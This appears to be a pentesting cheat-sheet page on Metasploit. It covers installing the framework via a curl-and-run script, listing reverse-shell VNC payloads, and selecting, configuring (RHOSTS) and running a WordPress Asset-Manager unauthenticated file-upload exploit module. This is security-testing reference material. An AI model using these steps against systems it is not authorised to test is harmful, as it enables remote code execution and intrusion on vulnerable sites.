Metasploit

Install

# UBUNTU
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Commands

# "Show" can be use to view all available modules
msf6 > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions

# Example
msf6 > show payloads

588  payload/windows/x64/vncinject/reverse_tcp_rc4                                normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
589  payload/windows/x64/vncinject/reverse_tcp_uuid                               normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
590  payload/windows/x64/vncinject/reverse_winhttp                                normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
591  payload/windows/x64/vncinject/reverse_winhttps                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

# "use" will set the chosen module to be executed
msf6 > use $MODULE_PATH or $SEARCH_ID

# Ex:
588  exploit/unix/webapp/wp_asset_manager_upload_exec

msf6 > use exploit/unix/webapp/wp_asset_manager_upload_exec
OR
msf6 > use 558

msf6 exploit(unix/webapp/wp_asset_manager_upload_exec) >

# "show info" with selected module will show all the options
# and description about it
msf6 exploit(unix/webapp/wp_asset_manager_upload_exec) > show info


       Name: WordPress Asset-Manager PHP File Upload Vulnerability
     Module: exploit/unix/webapp/wp_asset_manager_upload_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-05-26

Provided by:
  Sammy FORGIT
  James Fitts <fitts.james@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   asset-manager <= 2.0

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability found in Asset-Manager <= 2.0 
  WordPress plugin. By abusing the upload.php file, a malicious user 
  can upload a file to a temp directory without authentication, which 
  results in arbitrary code execution.

References:
  OSVDB (82653)
  http://www.securityfocus.com/bid/53809
  https://www.exploit-db.com/exploits/18993
  http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html
  https://wpscan.com/vulnerability/6106

# "set $OPTION $VALUE" will set the value of an option for the module
msf6 exploit(my/exploit/path) > set RHOSTS mysite.com
RHOSTS => mysite.com

# "run" will execute the exploit
msf6 exploit(my/exploit/path) > run

# Search for exploits 
msf6 > search type:exploit fullname:"Windows X.Y.Z"
  # type:exploit -> show only exploits
  # fullname:"Windows X.Y.Z" -> filter for specific info

Previoussearchsploit Nextwget

Last updated 4 years ago

Was this helpful?